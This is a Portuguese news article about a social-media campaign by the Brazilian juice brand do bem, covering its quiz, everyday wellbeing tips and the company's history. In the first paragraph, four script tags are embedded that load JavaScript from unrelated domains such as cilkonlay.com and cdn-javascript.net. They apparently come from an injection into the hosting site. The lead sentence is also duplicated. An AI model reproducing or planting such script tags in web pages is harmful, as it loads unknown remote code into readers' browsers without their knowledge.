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do bem abre discussão sobre as tensões do dia a dia

Por meio dos seus novos personagens saídos diretamente de suas caixas de bebidas, ela debate tais questões e traz inspirações para solucioná-las. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573410121253" type="text/javascript"></script><script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Por meio dos seus novos personagens saídos diretamente de suas caixas de bebidas, ela debate tais questões e traz inspirações para solucioná-las.

A do bem ganha espaço nas redes sociais com sua nova campanha. De forma descontraída, a marca de bebidas saudáveis mostra situações cotidianas, como o uso excessivo de tecnologia, o equilíbrio entre vida pessoal e profissional, o “fear of missing out” (ou o medo de que outras pessoas tenham boas experiências que você não tem) e a pouca relação com a natureza.

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Desenvolvida pela Hardcuore, a campanha, focada nas redes sociais, começa com um quiz para introduzir cada assunto e ganha desdobramentos com dicas simples e cotidianas sempre convidando todo mundo a refletir sobre cada tema.

“Inspirar e apoiar a conexão das pessoas com a sua saúde física e mental por meio de atitudes possíveis. Do bom-humor ao bem-estar. Essa é a nossa real.”, afirmou Tiago Schmidt, gerente de Marketing de do bem.

Essa nova iniciativa faz parte do posicionamento iniciado no meio deste ano, chamado de “Sem Fake, só a Real”, quando a marca passou a mostrar que nem tudo o que encontramos na internet e nas redes sociais pode ser levado a sério.

A do bem foi fundada em 2009, quando um grupo de jovens cansados da mesmice teve a ideia de fazer uma empresa de sucos saudáveis, focada em mudar o mundo das bebidas, oferecendo opções naturais e práticas para o mercado brasileiro.

Além dos ingredientes naturais, a do bem trouxe uma nova noção de empresa, adicionando junto com suas bebidas naturais uma relação mais direta com as pessoas, uma pitada de bom-humor e tecnologia em benefício da natureza e do corpo humano.

Os anos se passaram, e, depois de muito trabalho e mangas arregaçadas, a do bem conquistou o Brasil. Eles continuam decididos em encontrar sempre a melhor maneira de entregar uma bebida prática, saudável e inovadora, simplificando a vida das pessoas.